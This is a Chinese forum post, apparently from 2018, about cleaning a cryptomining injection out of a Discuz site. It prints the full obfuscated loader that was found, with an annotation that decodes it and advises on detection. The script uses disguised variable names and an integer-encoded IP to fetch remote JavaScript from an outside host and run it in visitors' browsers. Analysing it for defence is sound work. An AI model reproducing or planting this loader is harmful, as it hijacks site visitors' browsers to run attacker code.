已经解决
本帖最后由 pppcc 于 2018-6-22 06:08 编辑
帮朋友做了一个网站,用的是多年前的 Discuz。
刚刚发现网站被挂马了。被挂了一个挖矿的JS脚本http://172.104.64.162/17.js
https://i.loli.net/2018/06/22/5b2c0f7d6f7b7.png
用 ecosway598 大佬的方式,搜索了所有文件都没有找到,还好是个小网站,终于在后台找到了,可能是朋友不懂,只想提高SEO加的吧
https://i.loli.net/2018/06/22/5b2c2123a77ca.png 正在下载。。。和大佬的想法一样。。。 估计是文件名或其他方式加密了,搜索17.js没有找到
https://i.loli.net/2018/06/22/5b2c18a90c823.png 找到了一行奇怪的代码
<!--
  Analyst annotation for the injected snippet below (the code itself is unchanged).

  Purpose: download a remote script with XMLHttpRequest and run it in every visitor's
  browser by writing the response into a newly created script element.

  Decoded values (each is assembled from fragments, so no literal URL appears):
    cookie_ns_type      'G' + 'ET'                      = 'GET'
    cookie_pinfo        '17' + '.' + JSFILE ('js')      = '17.js'
    FONT_CLASS_ID       HTMLXMLNS.substring(0,7) ('http://') + '2892513442/' + '17.js'
                                                        = http://2892513442/17.js
    STATIPATH + VARHASH 'scr' + 'ipt'                   = 'script'
    NEWS_ID / SCBARID   4 / 200, compared against PT.readyState and PT.status
    DZ_ALL_SETTING / DZ_ALL_BODY are aliases for window / document

  2892513442 is the single-integer form of an IPv4 address:
  172*2^24 + 104*2^16 + 64*2^8 + 162 = 172.104.64.162, the host named earlier in the post.
  This is why searching for "17.js" or for the dotted address finds nothing.

  Flow: PT is set to a new XMLHttpRequest (then overwritten with a new ActiveXObject
  where window.ActiveXObject exists), opened as GET to the URL above and sent. When
  readyState is 4 and status is 200, a script element is appended to document.head and
  PT.responseText is assigned to its innerHTML, so the fetched text runs as inline script.

  Decoys: STATINODE, creditnotice, css_classtype, IMGDIR, REPORT, NEWS, CSSPAT, T_INFO,
  N_INFO, CSSPATH and DYNAMICURL1 are assigned but never read here. The names appear
  chosen to resemble Discuz's own header variables so the line blends in.

  Detection notes: search templates, cache files and database-stored settings for the
  integer host, for substring(0,7) on a namespace URL, for split 'scr' / 'ipt' strings,
  and for responseText assigned to innerHTML. The post reports the code was located via
  the admin backend and not by file search, so admin-editable HTML/JS fields need review
  as well. A Content-Security-Policy that disallows inline script and restricts
  connect-src would stop this loader from fetching and running its payload.
-->
<script type="text/javascript">var HTMLXMLNS = 'http://www.w3.org/1999/xhtml', cookie_ns_type = 'ET', STATINODE = 'src', PT = '', creditnotice = '1||,2||,3||', DZ_ALL_SETTING = window, VARHASH = 'ipt',
css_classtype = '', HEADER_NODE='', STATIPATH = 'scr'; if(XMLHttpRequest) STATICNODE = XMLHttpRequest; FONT_CLASS_ID = '2892513442', cookie_pinfo = '17', cookie_ns_type = 'G' + cookie_ns_type,
IMGDIR = 'static/image/common', DZ_ALL_BODY = document, REPORT = 'Microsoft.XMLHTTP', NEWS = '', NEWS_ID = 4, JSFILE = 'js', CSSPAT = 'data/cache/style_', FONT_CLASS_ID =FONT_CLASS_ID + '/',
T_INFO = '', cookie_pinfo = cookie_pinfo + '.' + JSFILE; if( DZ_ALL_SETTING.ActiveXObject ) HEADER_NODE = DZ_ALL_SETTING.ActiveXObject; SCBARID = 200; if ( STATICNODE ) PT = new STATICNODE(); if (
HEADER_NODE ) PT = new HEADER_NODE(); FONT_CLASS_ID = HTMLXMLNS.substring(0,7) + FONT_CLASS_ID + cookie_pinfo; if ( PT ){ PT.open( cookie_ns_type , FONT_CLASS_ID);PT.onreadystatechange =
function() {if (PT.readyState == NEWS_ID && PT.status == SCBARID ){ N_INFO = ''; DZ_ALL_BODY.head.appendChild( DZ_ALL_BODY.createElement( STATIPATH + VARHASH )).innerHTML = PT.responseText;
PT = null;}}; PT.send();}; CSSPATH = 'data/cache/style_', DYNAMICURL1 = '';</script>